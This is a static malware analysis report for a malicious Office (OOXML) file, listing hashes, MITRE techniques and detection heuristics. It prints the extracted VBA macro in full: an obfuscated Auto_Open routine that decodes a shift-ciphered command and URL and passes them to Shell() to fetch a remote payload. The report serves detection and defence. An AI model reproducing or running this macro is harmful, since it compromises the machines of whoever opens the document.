Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 014eacfbbd11a539…

MALICIOUS

Office (OOXML)

10.1 KB First seen: 2021-11-24
MD5: e1bff068572ee4998966250b05630f5c SHA-1: 4abb9ed999f59c506553f553b2976f838f77856b SHA-256: 014eacfbbd11a539e6d32617fadedf33453c8f6b9510178fe493aea50b24990f
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with an Auto_Open macro. This macro uses a character-shift decoding function to construct and execute a command via the Shell() function. The decoded command is likely a payload downloader, indicated by the critical heuristic firings for Shell() calls and character-shift decoding.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/ajsodkaoskdoaksd.b)
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELL
    VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2959 bytes
SHA-256: dbd85fcf3d210c554a4c8ea230247e1f4852bf97bf60c3ebff746df5b3a00e23
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
Debug.Print MsgBox(qXglP77Xz("LYYVY(", "7"), vbOKCancel); returns; 1
Dim ynqvxPcX4 As String
Dim IztWb1wSm As String
Dim xrFCm28Ci As String
ynqvxPcX4 = qXglP77Xz("KBd qvlw {d{�{|mu;:dkitk6m€md66du{p|i(", "8")
IztWb1wSm = qXglP77Xz("jvvru<11yyy0dkvn{0eqo1", "2")
xrFCm28Ci = "wjdwdowdwodwdwokwdokwddj"
Debug.Print ynqvxPcX4
Debug.Print IztWb1wSm
Debug.Print xrFCm28Ci
Debug.Print (Shell(ynqvxPcX4 + IztWb1wSm + xrFCm28Ci))
End Sub
Public Function qXglP77Xz(UE2EtbVNL As String, Rb47W0TWO As Integer)
    Dim wDJHxwWIO As Integer
    For wDJHxwWIO = 1 To Len(UE2EtbVNL)

GoTo hFAdfMSltiOKKINFMd
hFAdfMSltiOKKINFMd:
GoTo piepGUqeoLGklRmrzpU:
olThGGiqDfeCTuUgasbxhsyuF:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo mtvEcQACjpIQFlhhfkVc
mQrdtwzrPtYDsMCtHRAAnaBYkygx:
GoTo BbOMGZVsOntpAD
dQpmIfDvrDTjEsBZTxz:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo RRgXZRqTwydSmdUhsb
RRgXZRqTwydSmdUhsb:
GoTo fdiFLSxKJagYwLEpQZtV
TvPuSkwlicurOyIOK:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo noJLUsZCSzFZhVBxxwAm
noJLUsZCSzFZhVBxxwAm:
        Mid(UE2EtbVNL, wDJHxwWIO, 1) = Chr(Asc(Mid(UE2EtbVNL, wDJHxwWIO, 1)) - Rb47W0TWO)
GoTo mQrdtwzrPtYDsMCtHRAAnaBYkygx
mtvEcQACjpIQFlhhfkVc:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo AbaqgjbzdHFnwmdrBkkQQy
piepGUqeoLGklRmrzpU:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo aOOpwKmGlJbnbZTliF
aOOpwKmGlJbnbZTliF:
GoTo olThGGiqDfeCTuUgasbxhsyuF
REfBAdJcNRr:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo dQpmIfDvrDTjEsBZTxz
AbaqgjbzdHFnwmdrBkkQQy:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo oAFCNefBCLjQtJpyPX
oAFCNefBCLjQtJpyPX:
GoTo TvPuSkwlicurOyIOK
uHGQbeUuJCmTVrTYmwQ:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo REfBAdJcNRr
BbOMGZVsOntpAD:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo opzIDhwPkCxmSbcafPJ
opzIDhwPkCxmSbcafPJ:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo NsnomrcVdHiTjnphHj
NsnomrcVdHiTjnphHj:
GoTo uHGQbeUuJCmTVrTYmwQ
fdiFLSxKJagYwLEpQZtV:

    Next wDJHxwWIO

GoTo OuiDtkJrreRrObpWna
OuiDtkJrreRrObpWna:
GoTo VsOntpADSopzIDhwPkCx:
hnuZmlBFHzZngQyAU:
    qXglP77Xz = UE2EtbVNL
GoTo CPMvIiiJRfGbFev
iLNtNTbQwFGE:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo hnuZmlBFHzZngQyAU
QkshMIIHLxDKcCBRH:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo CbEjhODYNESdLLyza
sgRtPOqYpbf:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo grlDAQsQJFQixSFP
CPMvIiiJRfGbFev:
GoTo wHBTCaJTaVhyNUQgDyce
vQrVuMYMJDV:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo qakqmyOPlnwTBeubhAI
grlDAQsQJFQixSFP:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo iLNtNTbQwFGE
VsOntpADSopzIDhwPkCx:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo rjHQPzikEhmzJ
rjHQPzikEhmzJ:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo sgRtPOqYpbf
CbEjhODYNESdLLyza:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo vQrVuMYMJDV
wHBTCaJTaVhyNUQgDyce:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo QkshMIIHLxDKcCBRH
qakqmyOPlnwTBeubhAI:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo SbcafPJQuHGQ
SbcafPJQuHGQ:

End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/ajsodkaoskdoaksd.b 19968 bytes
SHA-256: 0bcbade375f4f1ed1a73a31f526e24ee8bf3ee9def17a5b031dec64df5bd4039

Open this report in the interactive analyzer, or submit your own file for analysis.